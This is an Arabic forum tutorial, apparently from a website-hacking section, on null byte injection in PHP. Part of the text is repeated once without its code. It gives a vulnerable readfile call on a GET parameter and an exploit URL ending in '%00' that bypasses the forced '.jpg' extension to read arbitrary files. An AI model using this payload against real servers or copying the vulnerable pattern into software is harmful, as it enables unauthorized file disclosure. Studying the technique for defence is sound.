Null Byte Attack
السلام عليكم ورحمة الله تعالى وبركاته.
المهم... بالنسبه للمطلعين على البرمجه في السي ..
null byte = '\0'
وهو يكون في نهاية مصفوفات الحروف
مثلا :
في الذاكرة يتم تسجيل اسمي على الشكل التالي :
وبالتالي \0 ترمز الى نهاية المصفوفة ...
سنتطرق الى هذه الدروس في دورة السي، المهم :bleh:
نفترض عندنا سكربت يمكن من تحميل الصور فقط من السيرفر..
الاستغلال :
ينفذ الامر هكذا في السيرفر :
والسلام عليكم..
المهم... بالنسبه للمطلعين على البرمجه في السي ..
null byte = '\0'
وهو يكون في نهاية مصفوفات الحروف
مثلا :
PHP:
char C[]="nor15din";في الذاكرة يتم تسجيل اسمي على الشكل التالي :
PHP:
'n' 'o' 'r' '1' '5' 'd' 'i' 'n' '\0'وبالتالي \0 ترمز الى نهاية المصفوفة ...
سنتطرق الى هذه الدروس في دورة السي، المهم :bleh:
نفترض عندنا سكربت يمكن من تحميل الصور فقط من السيرفر..
PHP:
readfile($_GET["image"] . ".jpg");الاستغلال :
PHP:
http://www.site.com/download.php?image=file.txt%00ينفذ الامر هكذا في السيرفر :
PHP:
readfile("file.txt\0.jpg");والسلام عليكم..
اسم الموضوع : Null Byte Attack
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات